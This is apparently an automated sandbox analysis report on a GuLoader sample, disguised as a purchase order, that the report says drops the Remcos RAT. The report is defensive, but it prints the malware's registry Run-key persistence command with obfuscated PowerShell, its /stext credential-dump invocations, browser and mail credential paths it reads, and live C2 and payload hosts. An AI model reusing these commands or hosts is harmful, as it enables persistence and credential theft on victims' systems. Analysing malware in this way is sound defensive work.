              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5964Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3811Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2911Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.3 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8028Thread sleep count: 2911 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 2911 delay: -5Jump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00418981 memset,GetSystemInfo,12_2_00418981
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\skabiose\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: wab.exe, 00000007.00000002.2939812066.00000000096BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wab.exe, 00000007.00000002.2939812066.00000000096F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeAPI call chain: ExitProcess graph end nodegraph_0-2864
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeAPI call chain: ExitProcess graph end nodegraph_0-3043
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_13-33816
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04AEDAAC LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,1_2_04AEDAAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3DA0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2B3F8CCJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hdqrgswaarisauuvaipksos"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jfwcglgtwzafkaizktcddtnovi"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%slettelsers% -windowstyle minimized $ronnels=(get-itemproperty -path 'hkcu:\forsorgspdagog\').skeletoverstter;%slettelsers% ($ronnels)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%slettelsers% -windowstyle minimized $ronnels=(get-itemproperty -path 'hkcu:\forsorgspdagog\').skeletoverstter;%slettelsers% ($ronnels)"Jump to behavior
              Source: wab.exe, 00000007.00000002.2939960711.000000000971C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerlesos
              Source: wab.exe, 00000007.00000002.2939960711.000000000971C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ*3:
              Source: wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager05776
              Source: wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,12_2_0041881C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,13_2_004082CD
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeCode function: 0_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406072
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2443472067.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2939981416.000000000971F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2417578332.000000000971A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7812, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword13_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword13_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword13_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7812, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2443472067.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2939981416.000000000971F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2417578332.000000000971A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7812, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts11
              Native API              		1
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts112
              Command and Scripting Interpreter              		Logon Script (Windows)212
              Process Injection              		1
              Software Packing              		2
              Credentials in Registry              		3
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login Hook1
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		1
              Credentials In Files              		19
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading              		LSA Secrets221
              Security Software Discovery              		SSH2
              Clipboard Data              		213
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Modify Registry              		Cached Domain Credentials141
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
              Virtualization/Sandbox Evasion              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428880 Sample: z14Novospedidosdecompra_Pro... Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 46 learfo55ozj01.duckdns.org 2->46 48 ricohltd.top 2->48 50 geoplugin.net 2->50 58 Snort IDS alert for network traffic 2->58 60 Found malware configuration 2->60 62 Antivirus detection for URL or domain 2->62 66 11 other signatures 2->66 10 z14Novospedidosdecompra_Profil_4903.exe 2 29 2->10         started        signatures3 64 Uses dynamic DNS services 46->64 process4 file5 42 C:\Users\user\AppData\...\Kursusplans.Fje, ASCII 10->42 dropped 74 Suspicious powershell command line found 10->74 14 powershell.exe 20 10->14         started        signatures6 process7 file8 44 z14Novospedidosdecompra_Profil_4903.exe, PE32 14->44 dropped 82 Obfuscated command line found 14->82 84 Writes to foreign memory regions 14->84 86 Found suspicious powershell code related to unpacking or dynamic code loading 14->86 88 2 other signatures 14->88 18 wab.exe 5 15 14->18         started        23 conhost.exe 14->23         started        25 cmd.exe 1 14->25         started        signatures9 process10 dnsIp11 52 learfo55ozj01.duckdns.org 193.222.96.21, 29871, 49738, 49739 SWISSCOMSwisscomSwitzerlandLtdCH Germany 18->52 54 ricohltd.top 104.21.60.38, 443, 49737 CLOUDFLARENETUS United States 18->54 56 geoplugin.net 178.237.33.50, 49740, 80 ATOM86-ASATOM86NL Netherlands 18->56 40 C:\Users\user\AppData\Roaming\mqerms.dat, data 18->40 dropped 68 Maps a DLL or memory area into another process 18->68 70 Hides threads from debuggers 18->70 72 Installs a global keyboard hook 18->72 27 wab.exe 1 18->27         started        30 wab.exe 1 18->30         started        32 wab.exe 14 18->32         started        34 2 other processes 18->34 file12 signatures13 process14 signatures15 76 Tries to steal Instant Messenger accounts or passwords 27->76 78 Tries to harvest and steal browser information (history, passwords, etc) 27->78 80 Tries to steal Mail credentials (via file / registry access) 30->80 36 conhost.exe 34->36         started        38 reg.exe 1 1 34->38         started        process16

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              z14Novospedidosdecompra_Profil_4903.exe58%ReversingLabsWin32.Trojan.GuLoader
              z14Novospedidosdecompra_Profil_4903.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe58%ReversingLabsWin32.Trojan.GuLoader

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.imvu.comr0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp100%URL Reputationphishing
              https://contoso.com/0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              learfo55ozj01.duckdns.org
              		193.222.96.21
              		truetrue
                		unknown
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		unknown
                  ricohltd.top
                  		104.21.60.38
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    learfo55ozj01.duckdns.orgtrue
                      		unknown
                      http://geoplugin.net/json.gptrue
                      • URL Reputation: phishing
                      		unknown
                      https://ricohltd.top/PIoDroeALMbPB243.binfalse
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
